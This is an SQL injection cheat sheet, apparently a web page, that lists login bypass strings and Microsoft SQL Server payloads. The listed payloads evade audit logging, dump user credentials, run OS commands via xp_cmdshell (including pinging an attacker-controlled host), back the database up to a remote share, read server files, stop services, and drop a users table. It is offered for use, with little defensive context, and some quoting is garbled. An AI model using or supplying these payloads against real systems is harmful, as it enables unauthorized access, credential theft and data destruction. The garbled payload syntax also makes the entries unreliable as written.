Generic – Bypass Authentication
The following payloads are generally applied to login forms with a username and password. Correctly performing these attacks will allow you to authenticate to the web application (unless otherwise stated).
realusername’ OR 1=1–
Authenticate as a real user without requiring a password.
‘OR ” = ‘
Allows authentication without a valid username.
admin’–
Authenticate as user admin without a password.
‘ union select 1, ‘user’, ‘pass’ 1–
Requires knowledge of column names.
‘; drop table users–
DANGEROUS! this will delete the user database if the table name is ‘users’.
Microsoft SQL
‘admin –sp_password
sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files.
- Appending this after your comments (–) can prevent SQL Injection queries being logged.
- select @@version
View database version. - select @@servername
Misc. information disclosure - select @@microsoftversion
Misc. information disclosure - select * from master..sysservers
Misc. information disclosure - select * from sysusers
View database usernames and passwords. - exec master..xp_cmdshell ‘ipconfig+/all’
Misc. command execution with cp_cmdshell. - exec master..xp_cmdshell ‘net+view’
Misc. command execution with cp_cmdshell. - exec master..xp_cmdshell ‘net+users’
Misc. command execution with cp_cmdshell. - exec master..xp_cmdshell ‘ping+system-controlled-by-attacker’
Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results - are displayed).
- BACKUP database master to disks='{IP}{sharename}backupdb.dat’
Backup entire database to a file. This attack can be used to steal a database. - create table myfile (line varchar(8000))” bulk insert foo from ‘c:inetpubwwwrootauth.asp’” select * from myfile”–
Reading files on the filesystem. - xp_servicecontrol (START or STOP)
Start and stop Windows Services. - str1 + str2 OR n+n
Concat strings for blind SQL Injection tests.